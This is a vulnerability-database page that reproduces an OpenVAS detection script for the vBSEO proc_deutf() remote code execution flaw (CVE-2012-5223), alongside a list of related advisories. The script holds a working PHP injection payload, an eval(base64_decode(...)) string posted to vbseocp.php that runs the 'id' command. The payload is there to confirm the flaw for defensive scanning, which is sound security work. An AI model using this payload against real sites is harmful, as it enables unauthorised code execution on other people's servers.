Lucene search
+L

vBSEO 'proc_deutf()' RCE Vulnerability - Active Check

🗓️ 31 Jan 2012 00:00:00Reported by Copyright (C) 2012 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 24 Views

vBSEO 'proc_deutf()' RCE Vulnerability. Remote code-execution in vBSEO 3.5.0, 3.5.1, 3.5.2, and 3.6.0

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2012-5223
1 Oct 201220:55
attackerkb
circl
Circl
CVE-2012-5223
27 Jan 201200:00
circl
checkpoint_advisories
Check Point Advisories
vBSEO Remote PHP Code Injection (CVE-2012-5223)
6 Jun 201300:00
checkpoint_advisories
cve
CVE
CVE-2012-5223
1 Oct 201220:00
cve
cvelist
Cvelist
CVE-2012-5223
1 Oct 201220:00
cvelist
dsquare
Dsquare
vBSEO 3.6.0 RCE
31 Jan 201200:00
dsquare
exploitdb
Exploit DB
vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection (Metasploit)
27 Jan 201200:00
exploitdb
metasploit
Metasploit
vBSEO proc_deutf() Remote PHP Code Injection
23 Jan 201200:00
metasploit
nvd
NVD
CVE-2012-5223
1 Oct 201220:55
nvd
openvas
OpenVAS
vBSEO 'proc_deutf()' Remote Code Execution Vulnerability
31 Jan 201200:00
openvas
Rows per page
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:vbulletin:vbulletin";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103405");
  script_cve_id("CVE-2012-5223");
  script_version("2025-05-29T05:40:25+0000");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_name("vBSEO 'proc_deutf()' RCE Vulnerability - Active Check");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/51647");
  script_xref(name:"URL", value:"http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/");

  script_tag(name:"last_modification", value:"2025-05-29 05:40:25 +0000 (Thu, 29 May 2025)");
  script_tag(name:"creation_date", value:"2012-01-31 14:44:01 +0100 (Tue, 31 Jan 2012)");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_dependencies("vbulletin_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("vbulletin/http/detected");

  script_tag(name:"summary", value:"vBSEO is prone to a remote code execution (RCE)
  vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP POST request and checks the response.");

  script_tag(name:"impact", value:"Exploiting this issue will allow attackers to execute arbitrary
  code within the context of the affected application.");

  script_tag(name:"affected", value:"vBSEO 3.5.0, 3.5.1, 3.5.2, and 3.6.0.are vulnerable, other
  versions may also be affected.");

  script_tag(name:"solution", value:"Updates are available. Please see the references for more
  details.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("misc_func.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

url = string(dir, "/vbseocp.php");

cmd = base64(str:'passthru("id");');
ex = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>";
len = strlen(ex);

host = http_host_name(port:port);

req = string("POST ", url, " HTTP/1.1\r\n",
             "Host: ", host, "\r\n",
             "Code: ", cmd, "\r\n",
             "Content-Type: application/x-www-form-urlencoded\r\n",
             "Content-Length: ", len, "\r\n",
             "\r\n",
             ex);

result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

if(result && egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:result)) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 May 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
EPSS0.40533
24